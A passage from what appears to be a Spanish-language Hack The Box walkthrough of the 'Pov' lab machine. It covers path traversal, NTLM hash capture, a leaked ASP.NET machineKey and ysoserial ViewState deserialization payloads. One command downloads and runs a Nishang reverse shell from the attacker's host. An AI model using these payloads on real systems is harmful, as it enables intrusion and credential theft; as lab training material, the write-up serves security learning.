class="line"><span class="cl"><span class="m">302</span> GET 2l 10w 156c http://dev.pov.htb/portfolio/assets/ <span class="o">=</span>&gt; http://dev.pov.htb:8080/portfolio </span></span><span class="line"><span class="cl"><span class="m">302</span> GET 2l 10w 156c http://dev.pov.htb/portfolio/assets/vendors/jquery/ <span class="o">=</span>&gt; http://dev.pov.htb:8080/portfolio </span></span><span class="line"><span class="cl"><span class="m">302</span> GET 2l 10w 156c http://dev.pov.htb/portfolio/assets/js/ <span class="o">=</span>&gt; http://dev.pov.htb:8080/portfolio </span></span><span class="line"><span class="cl"><span class="m">302</span> GET 2l 10w 156c http://dev.pov.htb/portfolio/assets/imgs/ <span class="o">=</span>&gt; http://dev.pov.htb:8080/portfolio </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 105l 502w 40401c http://dev.pov.htb/portfolio/assets/imgs/avatar-1.jpg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 67l 370w 29350c http://dev.pov.htb/portfolio/assets/imgs/avatar-3.jpg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 1081l 1807w 16450c http://dev.pov.htb/portfolio/assets/vendors/themify-icons/css/themify-icons.css </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 126l 692w 55960c http://dev.pov.htb/portfolio/assets/imgs/blog-3.jpg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 123l 822w 67260c http://dev.pov.htb/portfolio/assets/imgs/blog-2.jpg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 194l 1029w 81277c http://dev.pov.htb/portfolio/assets/imgs/folio-5.jpg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 245l 1128w 80751c http://dev.pov.htb/portfolio/assets/imgs/blog-1.jpg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 144l 883w 55365c http://dev.pov.htb/portfolio/assets/imgs/folio-2.jpg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 86l 557w 46195c http://dev.pov.htb/portfolio/assets/imgs/avatar-2.jpg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 150l 895w 76321c http://dev.pov.htb/portfolio/assets/imgs/folio-1.jpg </span></span><span class="line"><span class="cl"><span class="m">302</span> GET 2l 10w 156c http://dev.pov.htb/portfolio/assets/vendors/bootstrap/ <span class="o">=</span>&gt; http://dev.pov.htb:8080/portfolio </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 322l 1567w 132049c http://dev.pov.htb/portfolio/assets/imgs/folio-4.jpg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 118l 695w 61432c http://dev.pov.htb/portfolio/assets/imgs/avatar.jpg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 10598l 42768w 280364c http://dev.pov.htb/portfolio/assets/vendors/jquery/jquery-3.4.1.js </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 11646l 23442w 242029c http://dev.pov.htb/portfolio/assets/css/steller.css </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 7013l 22369w 222911c http://dev.pov.htb/portfolio/assets/vendors/bootstrap/bootstrap.bundle.js </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 106l 271w 4691c http://dev.pov.htb/portfolio/contact.aspx </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 1052l 2573w 48394c http://dev.pov.htb/portfolio/assets/imgs/man.svg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 52l 394w 33816c http://dev.pov.htb/portfolio/assets/imgs/folio-6.jpg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 423l 1217w 21359c http://dev.pov.htb/portfolio/ </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 2l 10w 159c http://dev.pov.htb/portfolio/assets <span class="o">=</span>&gt; http://dev.pov.htb/portfolio/assets/ </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 106l 271w 4691c http://dev.pov.htb/portfolio/Contact.aspx </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 423l 1217w 21371c http://dev.pov.htb/portfolio/default.aspx </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 423l 1217w 21371c http://dev.pov.htb/portfolio/Default.aspx </span></span></code></pre></td></tr></table> </div> </div><h1 id="path-traversal">Path traversal</h1> <p>El sitio muestra un enlace de descarga de un CV.</p> <p><img src="https://sckull.github.io/images/posts/htb/pov/Screenshot_202407521112.png" alt="image"></p> <p>Observamos que la solicitud de descarga tiene como valor cv.pdf en el parametro <code>file=</code>.</p> <p><img src="https://sckull.github.io/images/posts/htb/pov/Screenshot_202406481112.png" alt="image"></p> <p>Tras manipular el valor del parametro a default.aspx, este nos devuelve el codigo fuente de este archivo, ademas muestra el archivo <code>index.aspx.cs</code> como referencia.</p> <p><img src="https://sckull.github.io/images/posts/htb/pov/Screenshot_202413491112.png" alt="image"></p> <p>Al pasar el nombre del archivo obuvimos el codigo fuente en C# donde se muestra la funcion para descarga de archivos, se muestra un &ldquo;filtro&rdquo; para la combinacion de caracteres <code>../</code>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">using System<span class="p">;</span> </span></span><span class="line"><span class="cl">using System.Collections.Generic<span class="p">;</span> </span></span><span class="line"><span class="cl">using System.Web<span class="p">;</span> </span></span><span class="line"><span class="cl">using System.Web.UI<span class="p">;</span> </span></span><span class="line"><span class="cl">using System.Web.UI.WebControls<span class="p">;</span> </span></span><span class="line"><span class="cl">using System.Text.RegularExpressions<span class="p">;</span> </span></span><span class="line"><span class="cl">using System.Text<span class="p">;</span> </span></span><span class="line"><span class="cl">using System.IO<span class="p">;</span> </span></span><span class="line"><span class="cl">using System.Net<span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">public partial class index : System.Web.UI.Page <span class="o">{</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> protected void Page_Load<span class="o">(</span>object sender, EventArgs e<span class="o">)</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> protected void Download<span class="o">(</span>object sender, EventArgs e<span class="o">)</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> var <span class="nv">filePath</span> <span class="o">=</span> file.Value<span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nv">filePath</span> <span class="o">=</span> Regex.Replace<span class="o">(</span>filePath, <span class="s2">&#34;../&#34;</span>, <span class="s2">&#34;&#34;</span><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> Response.ContentType <span class="o">=</span> <span class="s2">&#34;application/octet-stream&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> Response.AppendHeader<span class="o">(</span><span class="s2">&#34;Content-Disposition&#34;</span>,<span class="s2">&#34;attachment; filename=&#34;</span> + filePath<span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> Response.TransmitFile<span class="o">(</span>filePath<span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> Response.End<span class="o">()</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="o">}</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="ntlm-hash">NTLM Hash</h2> <p>El parametro nos perminte enviar un recurso de SAMBA que, tras ejecutar responder observamos un hash NTLM, sin embargo no es posible crackear este hash.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Listening <span class="k">for</span> events... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>SMB<span class="o">]</span> NTLMv2-SSP Client : 10.10.11.251 </span></span><span class="line"><span class="cl"><span class="o">[</span>SMB<span class="o">]</span> NTLMv2-SSP Username : POV<span class="se">\s</span>fitz </span></span><span class="line"><span class="cl"><span class="o">[</span>SMB<span class="o">]</span> NTLMv2-SSP Hash : sfitz::POV:09b4db1340534752:9F0F0F9EDC969C67964A176B0DC4930B:010100000000000080303C969F74DA017923C2D0092BDEB1000000000200080041004D005600440001001E00570049004E002D00530047004F004900530036004E00390049004900320004003400570049004E002D00530047004F004900530036004E0039004900490032002E0041004D00560044002E004C004F00430041004C000300140041004D00560044002E004C004F00430041004C000500140041004D00560044002E004C004F00430041004C000700080080303C969F74DA0106000400020000000800300030000000000000000000000000200000AE666AA99671C9BF194CCC652C1660BF8101F665900DBA987DD1947CA91412060A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100350031000000000000000000 </span></span></code></pre></td></tr></table> </div> </div><h2 id="web-config">Web Config</h2> <p>Despues de intentar distintas direcciones logramos encontrar el directorio del subdominio, donde tambien encontramos el archivo <code>web.config</code> (c:\inetpub\wwwroot\dev\web.config).</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-xml" data-lang="xml"><span class="line"><span class="cl"><span class="nt">&lt;configuration&gt;</span> </span></span><span class="line"><span class="cl"> <span class="nt">&lt;system.web&gt;</span> </span></span><span class="line"><span class="cl"> <span class="nt">&lt;customErrors</span> <span class="na">mode=</span><span class="s">&#34;On&#34;</span> <span class="na">defaultRedirect=</span><span class="s">&#34;default.aspx&#34;</span> <span class="nt">/&gt;</span> </span></span><span class="line"><span class="cl"> <span class="nt">&lt;httpRuntime</span> <span class="na">targetFramework=</span><span class="s">&#34;4.5&#34;</span> <span class="nt">/&gt;</span> </span></span><span class="line"><span class="cl"> <span class="nt">&lt;machineKey</span> <span class="na">decryption=</span><span class="s">&#34;AES&#34;</span> <span class="na">decryptionKey=</span><span class="s">&#34;74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43&#34;</span> <span class="na">validation=</span><span class="s">&#34;SHA1&#34;</span> <span class="na">validationKey=</span><span class="s">&#34;5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468&#34;</span> <span class="nt">/&gt;</span> </span></span><span class="line"><span class="cl"> <span class="nt">&lt;/system.web&gt;</span> </span></span><span class="line"><span class="cl"> <span class="nt">&lt;system.webServer&gt;</span> </span></span><span class="line"><span class="cl"> <span class="nt">&lt;httpErrors&gt;</span> </span></span><span class="line"><span class="cl"> <span class="nt">&lt;remove</span> <span class="na">statusCode=</span><span class="s">&#34;403&#34;</span> <span class="na">subStatusCode=</span><span class="s">&#34;-1&#34;</span> <span class="nt">/&gt;</span> </span></span><span class="line"><span class="cl"> <span class="nt">&lt;error</span> <span class="na">statusCode=</span><span class="s">&#34;403&#34;</span> <span class="na">prefixLanguageFilePath=</span><span class="s">&#34;&#34;</span> <span class="na">path=</span><span class="s">&#34;http://dev.pov.htb:8080/portfolio&#34;</span> <span class="na">responseMode=</span><span class="s">&#34;Redirect&#34;</span> <span class="nt">/&gt;</span> </span></span><span class="line"><span class="cl"> <span class="nt">&lt;/httpErrors&gt;</span> </span></span><span class="line"><span class="cl"> <span class="nt">&lt;httpRedirect</span> <span class="na">enabled=</span><span class="s">&#34;true&#34;</span> <span class="na">destination=</span><span class="s">&#34;http://dev.pov.htb/portfolio&#34;</span> <span class="na">exactDestination=</span><span class="s">&#34;false&#34;</span> <span class="na">childOnly=</span><span class="s">&#34;true&#34;</span> <span class="nt">/&gt;</span> </span></span><span class="line"><span class="cl"> <span class="nt">&lt;/system.webServer&gt;</span> </span></span><span class="line"><span class="cl"><span class="nt">&lt;/configuration&gt;</span> </span></span></code></pre></td></tr></table> </div> </div><h1 id="viewstate-deserialization">ViewState Deserialization</h1> <p>El valor de ViewState en la descarga del CV nos recuerda a la explotacion en <a href="https://sckull.github.io/posts/arkham/#rce---request-dns">Arkham HTB</a> donde utilizamos ysoserial para generar un payload que nos permitio ejecutar comandos. Tras investigar ViewState y los valores en web.config nos topamos con <a href="https://notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net">ViewState Deserialization</a> donde se explican distintos casos para la explotacion.</p> <p>Ref. <a href="https://blog.liquidsec.net/2021/06/01/asp-net-cryptography-for-pentesters/">1</a>, <a href="https://notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net">2</a></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\s</span>ckull<span class="se">\D</span>ocuments<span class="se">\h</span>tb<span class="se">\R</span>elease&gt; .<span class="se">\y</span>soserial.exe -p ViewState -g TextFormattingRunProperties -c <span class="s2">&#34;powershell.exe Invoke-WebRequest -Uri http://10.10.14.151/sckull&#34;</span> --path<span class="o">=</span><span class="s2">&#34;/portfolio/default.aspx&#34;</span> --apppath<span class="o">=</span><span class="s2">&#34;/&#34;</span> --decryptionalg<span class="o">=</span><span class="s2">&#34;AES&#34;</span> --decryptionkey<span class="o">=</span><span class="s2">&#34;74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43&#34;</span> --validationalg<span class="o">=</span><span class="s2">&#34;SHA1&#34;</span> --validationkey<span class="o">=</span><span class="s2">&#34;5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468&#34;</span> </span></span><span class="line"><span class="cl">ryyGFeuW08Y0pGYKjm%2FZYuyhOdbCafdtZDU5MXKwXmnxVjfe53VehIjpKLO2%2BuCD3wPC%2FfPeWg50nESO8LlFEoQATKm6K46TnA%2FsIpEnRa9TeB%2FZ88BiMz%2Fsqmez7Eaa6gqfOyeZYP6gRKV9PG5IfcMlQIYjaU%2F3rVsPKmvVQjgK3GGkH%2FvV9XUhj18W1U121%2FYQ3aH0KRJ%2FJvWX%2BWg7GWvd0IOybiT%2BNFMyQruzpcKczPHBND0INdM74zhD8Ta27Jxtw9kQI7%2F%2FSFEtBz0E%2FPb2QdfNrDd6pf1l1TIxrV997kcvgGhTmfMbLBwF6u2f2yySueBL7jnhB84nq6tWa0Kz0I%2FoMTp9gj6KoTZ8Y8%2BxcqTneCjD6Zgb%2FNr%2Fh3TMTJEvuBf1jXv%2FXySVLcTRa5wenG81jE9h5uATnz4P6t4QBJQNIwwawV3QL1KXW2DjTKKkNVcWB9l9aGYCLgsPD8La5eCgozVSv5bQKo2RT3JfC0mrFPmNnqHiSapR6awPDw%2B9GPwI3ZjMzrGeX2rJvSbfFOqmm00ycGfUHhvWMUOwX6HFcCTEBpJQAe%2BmyFibPo4xNfLg1PWwwcbklRCnInwIWkuFEVJz%2Fo0SXHg5ZQcn8fPzzaLwgloaQ1Zy%2B%2BJVXbHcrz2BXbE3vLffE0RPrcHvayd0g67gPyb90%2FvlOJD2sE9K%2BdI7dfI%2FLN%2BZundHHjCiK4aHwtuStcGz6L5iGNLOO7pH4bC7Xm%2FM%2FnlkZUD4ImFz86DhVOrGLjA7z%2Bfo9p8VqmulFKH6lK8ax3dlrowfdhnWlejvhcBnB%2F%2BBL4yZXoHx4SXmvix4L5AbUYiyctnOGJXrWHyHKn4qw%2Fj%2F%2B81Gwgwf7vJ%2BlG4%2F7E%2FxXg02xnxE0P%2FRYZVo7fVV7d8V%2Frec3DTULrOurrovmIDOunrsQjo0ogWaAYnRigDyc4l4SmVQfsGkqOZ6ltZKe9bU0oxdll7lc6zaMizy9KtGnnLcghr0c18uXPJhZ8Mw2WY%2BqX%2F9QKgbBAuALYzONu8qCPe8pNZ7a65oG4cwdMZkjJu0aivzASb5186cWF69%2BW6MO37c7X4eVEgRWfaKCP6DLM70B4wh03t9dwzieXdyY%2BXy2JKFky4VNdvO2Jfq%2FFx1QT3NoGbWpoJuoQZGK5QBI5Rhx6oL6QMbVmpI6NS76Z%2BGWiOXm1R%2BWBcYV76SqcGHpoS4UNmmGLiYfIIkQLGsAOO9YeUH%2BospAIBNNzXE81co6CISQ6dbQWxXE6%2Fm%2B1mbkQPLAeCVSuu0w3yE52XkfHEb0DeHOuIvcRmFQ8dc7Fi0I8%2FoDKG%2BkSv5ywmvcVSUptXvygw52L%2BKomGE3ojJl5f2%2Fo4HAcjMYauv50GTQtpwMx8%3D </span></span><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\s</span>ckull<span class="se">\D</span>ocuments<span class="se">\h</span>tb<span class="se">\R</span>elease&gt; </span></span></code></pre></td></tr></table> </div> </div><p>Modificamos el valor del VieState y enviamos, la respuesta es un codigo 302.</p> <p><img src="https://sckull.github.io/images/posts/htb/pov/Screenshot_202443311112.png" alt="image"></p> <p>Si observamos nuestro servidor, se muestra una solicitud desde la maquina.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"> π ~/htb/pov/www ❯ httphere . </span></span><span class="line"><span class="cl"><span class="o">[</span>sudo<span class="o">]</span> password <span class="k">for</span> kali: </span></span><span class="line"><span class="cl">Serving HTTP on 0.0.0.0 port <span class="m">80</span> <span class="o">(</span>http://0.0.0.0:80/<span class="o">)</span> ... </span></span><span class="line"><span class="cl">10.10.11.251 - - <span class="o">[</span>12/Mar/2024 18:42:45<span class="o">]</span> <span class="s2">&#34;GET /sckull HTTP/1.1&#34;</span> <span class="m">404</span> - </span></span></code></pre></td></tr></table> </div> </div><h1 id="user---sfitz">User - sfitz</h1> <p>Ejecutamos nuevamente un comando esta vez para la ejecucion de una shell inversa de <a href="https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1">Nishang</a>, generamos el payload a ejecutar.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\s</span>ckull<span class="se">\D</span>ocuments<span class="se">\h</span>tb<span class="se">\R</span>elease&gt; .<span class="se">\y</span>soserial.exe -p ViewState -g TextFormattingRunProperties -c <span class="s2">&#34;powershell.exe -c iex(new-object net.webclient).downloadstring(&#39;http://10.10.14.151/nishang.ps1&#39;)&#34;</span> --path<span class="o">=</span><span class="s2">&#34;/portfolio/default.aspx&#34;</span> --apppath<span class="o">=</span><span class="s2">&#34;/&#34;</span> --decryptionalg<span class="o">=</span><span class="s2">&#34;AES&#34;</span> --decryptionkey<span class="o">=</span><span class="s2">&#34;74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43&#34;</span> --validationalg<span class="o">=</span><span class="s2">&#34;SHA1&#34;</span> --validationkey<span class="o">=</span><span class="s2">&#34;5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468&#34;</span> </span></span><span class="line"><span class="cl">9qyZT2YM3KdN1lEDhvMyddn0a79z0WdQEqX4pkq%2FFtOQOFKGrQsWcIobM4HvWpj0W3awEaXDIlzbdWVQtNIoBE7v9DB8dwImIgDasVh7EfgiHPczjitMEKReLd2zThZHuGmqrSdEL9Of2UhEvjUJqxxW9aEsHkF2%2B7bKcK%2BmGU%2Bwuzh%2FpEwZbc7wHpfxJ4dtb%2FvhbOf1EJraTxFtjQxkKDSlRNrnGxbLYvJCPxTzdialVwab2mExpR7texTVocfKSEM0YODQxLhGjBL6vYFjgJFGlerh3pE1JcR6PSmYTOCnvDhExRpPlBMePY6iL284hNUp4PfRabY25uhE7W7RuRgwZLj%2FVe1gwnVzhTzTeyJq8bNIi2pDDDYpe2f2blJd2HnnrVBR62HJn%2BQ7LFDHnNfIca3mTobMilJrtO8ljKSZXFp4z%2BSmo9FGTJGCWPjxP5pbIqlNhbv6nkQ01FugcyNzk7iq4Zu7LfwMDAnKSabH%2FEZd%2BmYhD7fuzpFLMcKozxo9IsJ%2FrFOKF1lDOiDF3R9x4nrfNxynKX4MQY8CJi2YpKfCShvnmLU98fWM%2ByWgR0xCuydCRDn26QekT7hFnP3Prs42BH3XYyJiTiAx6sJ0QDeBxIqa0Tyr%2BRtwt48MGtysWtTJ8hZdlZp4eVG%2Bpvwzr0KLFECbFv6GG%2Fk4LwEi8eeprozFBCHScn0hRKvqOvKqZsJOG31HigN0VkshmOo%2BfldWDMZDqTX9Mlbi%2BQvlzmfXiiWHx29NcRNgsLzABZoQ5NPj4x9rK6BoSsSQEymsGa4%2Fe5%2FGWL4EmuWSU1cyVvk5q1M5Yfmit4xamh0WehiEmZFreAVMZVcwIxTa%2Bg9Lr9kVVKhKK%2F3JSDOkxAGO50PGQ9XQf9E4eRnTzFnXbwdeEMRrN3b2lmeKTgTYsYrEq0xLVSxshLNNTLoueeS9MGgUvL4nXVcEjRbelQIM5mRwqNuxSaHVC%2Biil7wx8hPAeCGQkgWurz8cnralGYdnadyuFpIoaHVAVbZj1uTxu5E9wUPwHUx5bE3t4blhvWBugMWWR8bYK6NsqBY9vbbEJxqH4Ej73Gpnc4KriKQAESaA%2Bs2QYuaiDRxfEMr3oTFL40Dx2Jv8ZZrVTTWKRhqQyrPM5JqQ6tHfhNU41o3%2BvQOeWAz7eNPZNO1y1td4Jnv7KY4RVbulsuNwBnQwno2oCLAxEsXVrh%2F%2B7%2Ff6c3qPMu%2B9l1y4IdL1v5ctRW0c04%2FGuuKtrPaH6iPvhswIsXpavqz%2Fi3jFgnSOM8738osZbWa8ClmmMO8o9TeJq6%2BFAsGQRC4PlZSHpN5jQ%2F%2FSaAT0Q3zLivp4OTnOM7tfWFzq2kW5u09nmYJY%2FoSw3zZSSlLG6zSlYCdEziTQQKMGStyWhoFmdj8igI%2FnVVkOis3UdnPL%2BQ%3D%3D </span></span><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\s</span>ckull<span class="se">\D</span>ocuments<span class="se">\h</span>tb<span class="se">\R</span>elease&gt; </span></span></code></pre></td></tr></table> </div> </div><p>Tras enviar nuestro payload obtuvimos una shell como sfitz.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"> π ~/htb/pov ❯ rlwrap nc -lvp <span class="m">1335</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">1335</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.14.151<span class="o">]</span> from pov.htb <span class="o">[</span>10.10.11.251<span class="o">]</span> <span class="m">49798</span> </span></span><span class="line"><span class="cl">Windows PowerShell running as user POV$ on POV </span></span><span class="line"><span class="cl">Copyright <span class="o">(</span>C<span class="o">)</span> <span class="m">2015</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\w</span>indows<span class="se">\s</span>ystem32<span class="se">\i</span>netsrv&gt;whoami </span></span><span class="line"><span class="cl">pov<span class="se">\s</span>fitz </span></span><span class="line"><span class="cl">PS C:<span class="se">\w</span>indows<span class="se">\s</span>ystem32<span class="se">\i</span>netsrv&gt; </span></span></code></pre></td></tr></table> </div> </div><p>En Documents encontramos unas credenciales que indican al usuario alaading.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">PS C:<span class="se">\u</span>sers<span class="se">\s</span>fitz<span class="se">\d</span>ocuments&gt; ls </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Directory: C:<span class="se">\u</span>sers<span class="se">\s</span>fitz<span class="se">\d</span>ocuments </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Mode LastWriteTime Length Name </span></span><span class="line"><span class="cl">---- ------------- ------ ---- </span></span><span class="line"><span class="cl">-a---- 12/25/2023 2:26 PM <span class="m">1838</span> connection.xml </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\u</span>sers<span class="se">\s</span>fitz<span class="se">\d</span>ocuments&gt; cat connection.xml </span></span><span class="line"><span class="cl">&lt;Objs <span class="nv">Version</span><span class="o">=</span><span class="s2">&#34;1.1.0.1&#34;</span> <span class="nv">xmlns</span><span class="o">=</span><span class="s2">&#34;http://schemas.microsoft.com/powershell/2004/04&#34;</span>&gt; </span></span><span class="line"><span class="cl"> &lt;Obj <span class="nv">RefId</span><span class="o">=</span><span class="s2">&#34;0&#34;</span>&gt; </span></span><span class="line"><span class="cl"> &lt;TN <span class="nv">RefId</span><span class="o">=</span><span class="s2">&#34;0&#34;</span>&gt; </span></span><span class="line"><span class="cl"> &lt;T&gt;System.Management.Automation.PSCredential&lt;/T&gt; </span></span><span class="line"><span class="cl"> &lt;T&gt;System.Object&lt;/T&gt; </span></span><span class="line"><span class="cl"> &lt;/TN&gt; </span></span><span class="line"><span class="cl"> &lt;ToString&gt;System.Management.Automation.PSCredential&lt;/ToString&gt; </span></span><span class="line"><span class="cl"> &lt;Props&gt; </span></span><span class="line"><span class="cl"> &lt;S <span class="nv">N</span><span class="o">=</span><span class="s2">&#34;UserName&#34;</span>&gt;alaading&lt;/S&gt; </span></span><span class="line"><span class="cl"> &lt;SS <span class="nv">N</span><span class="o">=</span><span class="s2">&#34;Password&#34;</span>&gt;01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cdfb54340c2929419cc739fe1a35bc88000000000200000000001066000000010000200000003b44db1dda743e1442e77627255768e65ae76e179107379a964fa8ff156cee21000000000e8000000002000020000000c0bd8a88cfd817ef9b7382f050190dae03b7c81add6b398b2d32fa5e5ade3eaa30000000a3d1e27f0b3c29dae1348e8adf92cb104ed1d95e39600486af909cf55e2ac0c239d4f671f79d80e425122845d4ae33b240000000b15cd305782edae7a3a75c7e8e3c7d43bc23eaae88fde733a28e1b9437d3766af01fdf6f2cf99d2a23e389326c786317447330113c5cfa25bc86fb0c6e1edda6&lt;/SS&gt; </span></span><span class="line"><span class="cl"> &lt;/Props&gt; </span></span><span class="line"><span class="cl"> &lt;/Obj&gt; </span></span><span class="line"><span class="cl">&lt;/Objs&gt; </span></span><span class="line"><span class="cl">PS C:<span class="se">\u</span>sers<span class="se">\s</span>fitz<span class="se">\d</span>ocuments&gt; </span></span></code></pre></td></tr></table> </div> </div><p>Podemos obtener en texto plano el valor de la contrasena.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 